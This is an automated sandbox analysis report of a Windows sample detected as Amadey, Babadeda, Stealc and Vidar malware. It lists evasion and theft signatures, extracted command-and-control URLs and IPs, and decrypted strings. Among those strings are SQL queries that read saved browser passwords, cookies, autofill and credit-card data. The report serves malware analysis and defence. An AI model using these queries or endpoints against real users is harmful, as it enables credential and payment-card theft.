Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1482894
MD5: d3ce34e9bb2a33ab3d637e75af2a8bb8
SHA1: 6c309255f2e701f8325c0ba2eba8fe270c32e44a
SHA256: 8c207b724ee5d0febaa25aadf3861b31e3740412da99dfd53e5518db47082312
Tags: exe

Detection

Amadey, Babadeda, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Babadeda
Description: According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers' analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus users.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: http://185.215.113.16/stealc/random.exencoded Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be. Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/238F-46AF-ADB4-6C85480369C7 Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpsm Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/ows Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/7w Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpEscape Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpsoft Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/00003002 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exera Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exerb Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exeM32 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/enter.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php00003002 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/cost/random.exeW Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/stealc/random.exe393d Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php&b~ Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#1. Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php(8) Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/5499d72b3a3e55be.phposition: Avira URL Cloud: Label: malware
Source: 0.2.file.exe.4090e67.1.raw.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: file.exe.2036.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7716.18.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: C:\Users\user\1000003002\5aa32fec17.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\enter[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe ReversingLabs: Detection: 47%
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe Virustotal: Detection: 46%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\1000003002\5aa32fec17.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 22
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 08
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 20
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: 24
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sleep
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: user32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sscanf
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: http://85.28.47.31
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: silence
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sila
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HeapFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32Next
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Process32First
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindClose
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WriteFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetLastError
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SelectObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BitBlt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GdipFree
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetDC
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrStrA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmGetList
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PATH
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: browser:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: profile:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: url:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: login:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: password:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: OperaGX
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Network
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: .txt
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: TRUE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: FALSE
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: autofill
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: history
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cc
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: name:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: month:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: year:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: card:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Login Data
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Web Data
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: History
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: logins.json
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: usernameField
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: guid
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: plugins
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: CURRENT
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Local State
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: chrome
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: opera
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: firefox
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: wallets
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ProductName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: x32
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: x64
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DisplayName
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: Network Info:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: System Summary:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - HWID:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - OS:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - UserName:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - UTC:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Language:
Source: 0.2.file.exe.4090e67.1.raw.unpack String decryptor: - Keyboards:
